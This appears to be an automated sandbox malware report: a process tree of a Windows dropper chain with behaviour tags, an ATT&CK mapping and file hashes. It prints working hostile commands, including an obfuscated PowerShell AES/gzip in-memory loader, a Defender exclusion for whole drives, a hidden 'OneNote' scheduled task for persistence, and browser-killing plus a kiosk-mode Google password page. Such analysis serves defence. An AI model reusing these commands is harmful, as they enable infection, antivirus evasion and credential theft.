C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc1⤵PID:1296
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s nsi1⤵PID:1348
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager1⤵PID:1388
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp1⤵PID:1504
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem1⤵PID:1536
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netsvcs -p -s Themes1⤵PID:1548
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k NetworkService -p -s NlaSvc1⤵PID:1684
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s SENS1⤵PID:1696
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder1⤵PID:1752
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalService -p -s netprofm1⤵PID:1820
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p1⤵PID:1828
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository1⤵PID:1944
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkService -p -s Dnscache1⤵PID:1996
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p1⤵PID:2004
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt1⤵PID:1708
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection1⤵PID:1856
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNoNetworkFirewall -p1⤵PID:2248
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc1⤵PID:2268
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation1⤵PID:2312
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT1⤵PID:2568
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent1⤵PID:2576
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc1⤵PID:2664
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkService -p -s CryptSvc1⤵PID:2780
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer1⤵PID:2860
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks1⤵PID:2892
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService1⤵PID:2900
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s TokenBroker1⤵PID:2912
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc1⤵PID:3428
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵PID:3508
-
C:\Users\Admin\AppData\Local\Temp\9eddc13417679ef715743574858a0010f1017eef771b24756e99e2ea0ce8b893.exe"C:\Users\Admin\AppData\Local\Temp\9eddc13417679ef715743574858a0010f1017eef771b24756e99e2ea0ce8b893.exe"2⤵
- Adds Run key to start application
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:976 -
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\1u88t3.exeC:\Users\Admin\AppData\Local\Temp\IXP000.TMP\1u88t3.exe3⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Checks computer location settings
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
PID:1164 -
C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe"C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe"4⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Checks computer location settings
- Executes dropped EXE
- Identifies Wine through registry keys
- Adds Run key to start application
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:4488 -
C:\Users\Admin\AppData\Local\Temp\1011414001\Is4UWe7.exe"C:\Users\Admin\AppData\Local\Temp\1011414001\Is4UWe7.exe"5⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:1900
-
-
C:\Users\Admin\AppData\Local\Temp\1011421001\4aDoFRV.exe"C:\Users\Admin\AppData\Local\Temp\1011421001\4aDoFRV.exe"5⤵
- Checks computer location settings
- Executes dropped EXE
- Loads dropped DLL
- Checks processor information in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4452 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C C:\Users\Admin\AppData\Local\Temp\tmp1DB.tmp.bat & Del C:\Users\Admin\AppData\Local\Temp\tmp1DB.tmp.bat6⤵PID:4260
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\1011428021\1kokyes.cmd" "5⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2424 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo $host.UI.RawUI.WindowTitle='C:\Users\Admin\AppData\Local\Temp\1011428021\1kokyes.cmd';$FyWj='MaCjlyiCjlynCjlyMCjlyoCjlyduCjlylCjlyeCjly'.Replace('Cjly', ''),'ChmWQganmWQggemWQgExmWQgtemWQgnmWQgsimWQgonmWQg'.Replace('mWQg', ''),'Icnvsncnvsvocnvskecnvs'.Replace('cnvs', ''),'SRNXQpRNXQlitRNXQ'.Replace('RNXQ', ''),'TraZdQPnsfZdQPoZdQPrmFZdQPinaZdQPlBlZdQPoZdQPcZdQPkZdQP'.Replace('ZdQP', ''),'CoYnxMpyTYnxMoYnxM'.Replace('YnxM', ''),'CrJxpleJxplateJxplDeJxplcrJxplypJxpltJxploJxplrJxpl'.Replace('Jxpl', ''),'ReMofQadLMofQinMofQesMofQ'.Replace('MofQ', ''),'FrPRIloPRIlmBPRIlaPRIlsePRIl6PRIl4StPRIlriPRIlnPRIlgPRIl'.Replace('PRIl', ''),'GeCmWEtCCmWEurrCmWEentCmWEProCmWEcesCmWEsCmWE'.Replace('CmWE', ''),'DecYPPQomYPPQprYPPQeYPPQssYPPQ'.Replace('YPPQ', ''),'ElCVeDeCVeDmCVeDenCVeDtCVeDACVeDtCVeD'.Replace('CVeD', ''),'LoZkgMadZkgM'.Replace('ZkgM', ''),'EnxgNqtrxgNqyxgNqPoxgNqinxgNqtxgNq'.Replace('xgNq', '');powershell -w hidden;$modules=[System.Diagnostics.Process]::($FyWj[9])().Modules;if ($modules -match 'hmpalert.dll') { exit; };function KNqsT($FGzIO){$qTJqJ=[System.Security.Cryptography.Aes]::Create();$qTJqJ.Mode=[System.Security.Cryptography.CipherMode]::CBC;$qTJqJ.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$qTJqJ.Key=[System.Convert]::($FyWj[8])('F/CYQ0EbDuVrz43Fw7HAflbZrxpM1Hp/nrXbVkkPjcE=');$qTJqJ.IV=[System.Convert]::($FyWj[8])('hx60gr1/WrWhT6ObOEvP1Q==');$JfMQw=$qTJqJ.($FyWj[6])();$riBbq=$JfMQw.($FyWj[4])($FGzIO,0,$FGzIO.Length);$JfMQw.Dispose();$qTJqJ.Dispose();$riBbq;}function xPzjs($FGzIO){$VwcBC=New-Object System.IO.MemoryStream(,$FGzIO);$poyTz=New-Object System.IO.MemoryStream;$IHpbX=New-Object System.IO.Compression.GZipStream($VwcBC,[IO.Compression.CompressionMode]::($FyWj[10]));$IHpbX.($FyWj[5])($poyTz);$IHpbX.Dispose();$VwcBC.Dispose();$poyTz.Dispose();$poyTz.ToArray();}$TGLxA=[System.IO.File]::($FyWj[7])([Console]::Title);$twDSV=xPzjs (KNqsT ([Convert]::($FyWj[8])([System.Linq.Enumerable]::($FyWj[11])($TGLxA, 5).Substring(2))));$PXXvb=xPzjs (KNqsT ([Convert]::($FyWj[8])([System.Linq.Enumerable]::($FyWj[11])($TGLxA, 6).Substring(2))));[System.Reflection.Assembly]::($FyWj[12])([byte[]]$PXXvb).($FyWj[13]).($FyWj[2])($null,$null);[System.Reflection.Assembly]::($FyWj[12])([byte[]]$twDSV).($FyWj[13]).($FyWj[2])($null,$null); "6⤵
- System Location Discovery: System Language Discovery
PID:4328
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeC:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe6⤵
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4404 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden7⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3056
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" add-mppreference -exclusionpath @('C:\','D:\','F:\')7⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4772
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" [Console]::Title = ((Get-ScheduledTask).Actions.Execute -join '').Contains('C:\Users\Admin\AppData\Local\Temp\1011428021\1kokyes')7⤵
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1964
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'OneNote 38553' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\Network38553Man.cmd') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force7⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:2296
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c start "" "C:\Users\Admin\AppData\Roaming\Network38553Man.cmd"7⤵
- System Location Discovery: System Language Discovery
PID:4888 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /K "C:\Users\Admin\AppData\Roaming\Network38553Man.cmd"8⤵
- System Location Discovery: System Language Discovery
PID:1104 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo $host.UI.RawUI.WindowTitle='C:\Users\Admin\AppData\Roaming\Network38553Man.cmd';$FyWj='MaCjlyiCjlynCjlyMCjlyoCjlyduCjlylCjlyeCjly'.Replace('Cjly', ''),'ChmWQganmWQggemWQgExmWQgtemWQgnmWQgsimWQgonmWQg'.Replace('mWQg', ''),'Icnvsncnvsvocnvskecnvs'.Replace('cnvs', ''),'SRNXQpRNXQlitRNXQ'.Replace('RNXQ', ''),'TraZdQPnsfZdQPoZdQPrmFZdQPinaZdQPlBlZdQPoZdQPcZdQPkZdQP'.Replace('ZdQP', ''),'CoYnxMpyTYnxMoYnxM'.Replace('YnxM', ''),'CrJxpleJxplateJxplDeJxplcrJxplypJxpltJxploJxplrJxpl'.Replace('Jxpl', ''),'ReMofQadLMofQinMofQesMofQ'.Replace('MofQ', ''),'FrPRIloPRIlmBPRIlaPRIlsePRIl6PRIl4StPRIlriPRIlnPRIlgPRIl'.Replace('PRIl', ''),'GeCmWEtCCmWEurrCmWEentCmWEProCmWEcesCmWEsCmWE'.Replace('CmWE', ''),'DecYPPQomYPPQprYPPQeYPPQssYPPQ'.Replace('YPPQ', ''),'ElCVeDeCVeDmCVeDenCVeDtCVeDACVeDtCVeD'.Replace('CVeD', ''),'LoZkgMadZkgM'.Replace('ZkgM', ''),'EnxgNqtrxgNqyxgNqPoxgNqinxgNqtxgNq'.Replace('xgNq', '');powershell -w hidden;$modules=[System.Diagnostics.Process]::($FyWj[9])().Modules;if ($modules -match 'hmpalert.dll') { exit; };function KNqsT($FGzIO){$qTJqJ=[System.Security.Cryptography.Aes]::Create();$qTJqJ.Mode=[System.Security.Cryptography.CipherMode]::CBC;$qTJqJ.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$qTJqJ.Key=[System.Convert]::($FyWj[8])('F/CYQ0EbDuVrz43Fw7HAflbZrxpM1Hp/nrXbVkkPjcE=');$qTJqJ.IV=[System.Convert]::($FyWj[8])('hx60gr1/WrWhT6ObOEvP1Q==');$JfMQw=$qTJqJ.($FyWj[6])();$riBbq=$JfMQw.($FyWj[4])($FGzIO,0,$FGzIO.Length);$JfMQw.Dispose();$qTJqJ.Dispose();$riBbq;}function xPzjs($FGzIO){$VwcBC=New-Object System.IO.MemoryStream(,$FGzIO);$poyTz=New-Object System.IO.MemoryStream;$IHpbX=New-Object System.IO.Compression.GZipStream($VwcBC,[IO.Compression.CompressionMode]::($FyWj[10]));$IHpbX.($FyWj[5])($poyTz);$IHpbX.Dispose();$VwcBC.Dispose();$poyTz.Dispose();$poyTz.ToArray();}$TGLxA=[System.IO.File]::($FyWj[7])([Console]::Title);$twDSV=xPzjs (KNqsT ([Convert]::($FyWj[8])([System.Linq.Enumerable]::($FyWj[11])($TGLxA, 5).Substring(2))));$PXXvb=xPzjs (KNqsT ([Convert]::($FyWj[8])([System.Linq.Enumerable]::($FyWj[11])($TGLxA, 6).Substring(2))));[System.Reflection.Assembly]::($FyWj[12])([byte[]]$PXXvb).($FyWj[13]).($FyWj[2])($null,$null);[System.Reflection.Assembly]::($FyWj[12])([byte[]]$twDSV).($FyWj[13]).($FyWj[2])($null,$null); "9⤵
- System Location Discovery: System Language Discovery
PID:2204
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeC:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe9⤵
- System Location Discovery: System Language Discovery
PID:3616 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden10⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
PID:212
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" add-mppreference -exclusionpath @('C:\','D:\','F:\')10⤵
- Command and Scripting Interpreter: PowerShell
PID:6112
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" [Console]::Title = ((Get-ScheduledTask).Actions.Execute -join '').Contains('C:\Users\Admin\AppData\Roaming\Network38553Man')10⤵PID:6360
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'OneNote 38553' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\Network38553Man.cmd') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force10⤵
- Command and Scripting Interpreter: PowerShell
PID:6612
-
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\1011429001\aabe095923.exe"C:\Users\Admin\AppData\Local\Temp\1011429001\aabe095923.exe"5⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:2544 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2544 -s 16046⤵
- Program crash
PID:4624
-
-
-
C:\Users\Admin\AppData\Local\Temp\1011430001\b6e90f7d07.exe"C:\Users\Admin\AppData\Local\Temp\1011430001\b6e90f7d07.exe"5⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:2320
-
-
C:\Users\Admin\AppData\Local\Temp\1011431001\fff4f46f92.exe"C:\Users\Admin\AppData\Local\Temp\1011431001\fff4f46f92.exe"5⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:5028 -
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM firefox.exe /T6⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1768
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM chrome.exe /T6⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
PID:4840
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM msedge.exe /T6⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
PID:3716
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM opera.exe /T6⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
PID:2320
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM brave.exe /T6⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
PID:4500
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --no-default-browser-check --disable-popup-blocking6⤵PID:2716
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking7⤵
- Checks processor information in registry
- Modifies registry class
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of SetWindowsHookEx
PID:3408 -
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2028 -parentBuildID 20240401114208 -prefsHandle 1948 -prefMapHandle 1940 -prefsLen 23680 -prefMapSize 244658 -appDir "C:\Program Files\Mozilla Firefox\browser" - {13d90979-d237-48c7-a2ca-1bfbdb25cfdb} 3408 "\\.\pipe\gecko-crash-server-pipe.3408" gpu8⤵PID:5088
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2492 -parentBuildID 20240401114208 -prefsHandle 2476 -prefMapHandle 2472 -prefsLen 24600 -prefMapSize 244658 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {4c4dcb9a-01c8-4b73-8769-3cec4729ddcd} 3408 "\\.\pipe\gecko-crash-server-pipe.3408" socket8⤵PID:3268
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=3048 -childID 1 -isForBrowser -prefsHandle 3112 -prefMapHandle 3168 -prefsLen 22652 -prefMapSize 244658 -jsInitHandle 1304 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {76f53131-1c68-4d6f-bd3b-0b2a8a960379} 3408 "\\.\pipe\gecko-crash-server-pipe.3408" tab8⤵PID:4780
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=3660 -childID 2 -isForBrowser -prefsHandle 2812 -prefMapHandle 3272 -prefsLen 29090 -prefMapSize 244658 -jsInitHandle 1304 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {b5e649eb-0add-4421-8be7-b274d0e9d53e} 3408 "\\.\pipe\gecko-crash-server-pipe.3408" tab8⤵PID:3324
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=4260 -parentBuildID 20240401114208 -sandboxingKind 0 -prefsHandle 4252 -prefMapHandle 4180 -prefsLen 29090 -prefMapSize 244658 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {7671f4ea-c5ca-4954-9726-2eda91872fd3} 3408 "\\.\pipe\gecko-crash-server-pipe.3408" utility8⤵
- Checks processor information in registry
PID:6328
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5536 -childID 3 -isForBrowser -prefsHandle 5524 -prefMapHandle 5472 -prefsLen 27132 -prefMapSize 244658 -jsInitHandle 1304 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {5a36bb7e-657b-49b1-b169-c7f4554a1776} 3408 "\\.\pipe\gecko-crash-server-pipe.3408" tab8⤵PID:5284
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5760 -childID 4 -isForBrowser -prefsHandle 5680 -prefMapHandle 5688 -prefsLen 27132 -prefMapSize 244658 -jsInitHandle 1304 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {8cf1c0b9-32ab-4e67-b39a-a080709c0e72} 3408 "\\.\pipe\gecko-crash-server-pipe.3408" tab8⤵PID:5296
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5860 -childID 5 -isForBrowser -prefsHandle 5972 -prefMapHandle 5968 -prefsLen 27132 -prefMapSize 244658 -jsInitHandle 1304 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {06b2bf48-13ce-4578-8500-2184e7d1cf5b} 3408 "\\.\pipe\gecko-crash-server-pipe.3408" tab8⤵PID:5452
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\1011432001\8cc247243e.exe"C:\Users\Admin\AppData\Local\Temp\1011432001\8cc247243e.exe"5⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
PID:1988
-
-
C:\Users\Admin\AppData\Local\Temp\1011433001\23ee2d6bcc.exe"C:\Users\Admin\AppData\Local\Temp\1011433001\23ee2d6bcc.exe"5⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
PID:5820
-
-
C:\Users\Admin\AppData\Local\Temp\1011434001\d24aaa094f.exe"C:\Users\Admin\AppData\Local\Temp\1011434001\d24aaa094f.exe"5⤵PID:2376
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\2S9414.exeC:\Users\Admin\AppData\Local\Temp\IXP000.TMP\2S9414.exe3⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:3840 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3840 -s 16604⤵
- Program crash
PID:4492
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3840 -s 17164⤵
- Program crash
PID:1284
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3840 -s 17364⤵
- Program crash
PID:3504
-
-
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc1⤵PID:3640
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc1⤵PID:4196
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc1⤵PID:3724
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV1⤵PID:3796
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc1⤵PID:4360
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager1⤵PID:4632
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s NgcCtnrSvc1⤵PID:220
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k WerSvcGroup1⤵PID:5048
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 420 -p 3840 -ip 38402⤵PID:4200
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 424 -p 3840 -ip 38402⤵PID:4728
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 428 -p 3840 -ip 38402⤵PID:1092
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 436 -p 2544 -ip 25442⤵PID:4812
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv1⤵PID:5044
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s UsoSvc1⤵PID:3748
Network
MITRE ATT&CK Enterprise v15
Privilege Escalation
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Credential Access
Credentials from Password Stores
1Credentials from Web Browsers
1Unsecured Credentials
1Credentials In Files
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
717B
MD5822467b728b7a66b081c91795373789a
SHA1d8f2f02e1eef62485a9feffd59ce837511749865
SHA256af2343382b88335eea72251ad84949e244ff54b6995063e24459a7216e9576b9
SHA512bacea07d92c32078ca6a0161549b4e18edab745dd44947e5f181d28cc24468e07769d6835816cdfb944fd3d0099bde5e21b48f4966824c5c16c1801712303eb6
-
Filesize
1KB
MD567e486b2f148a3fca863728242b6273e
SHA1452a84c183d7ea5b7c015b597e94af8eef66d44a
SHA256facaf1c3a4bf232abce19a2d534e495b0d3adc7dbe3797d336249aa6f70adcfb
SHA512d3a37da3bb10a9736dc03e8b2b49baceef5d73c026e2077b8ebc1b786f2c9b2f807e0aa13a5866cf3b3cafd2bc506242ef139c423eaffb050bbb87773e53881e
-
Filesize
436B
MD5971c514f84bba0785f80aa1c23edfd79
SHA1732acea710a87530c6b08ecdf32a110d254a54c8
SHA256f157ed17fcaf8837fa82f8b69973848c9b10a02636848f995698212a08f31895
SHA51243dc1425d80e170c645a3e3bb56da8c3acd31bd637329e9e37094ac346ac85434df4edcdbefc05ae00aea33a80a88e2af695997a495611217fe6706075a63c58
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\103621DE9CD5414CC2538780B4B75751
Filesize192B
MD523fa222b904702e311e45b182e467f03
SHA102969e1e147151ca8cd140db67bf78ff544060f4
SHA256b3722f0c94f1f10d97c3ed549a1f38d6f95837c06eec8e3d4d9b66882a086aa1
SHA512379950d83954c6e43c80220dea026376b9daffaed626a1c8981819a1ef102f3078fe31eccaee4247fbd9e4381e7bdefbe688210632c3a0dff4444975959b9018
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\8B2B9A00839EED1DFDCCC3BFC2F5DF12
Filesize174B
MD58d594460eabd0cd00380ded149560ebe
SHA1f5b94b0fb78e20741151806443ee6fda7fce83df
SHA256f32bf98bb09c9de320f528f294561f1853890f3ca018f7e50a2943df76301c50
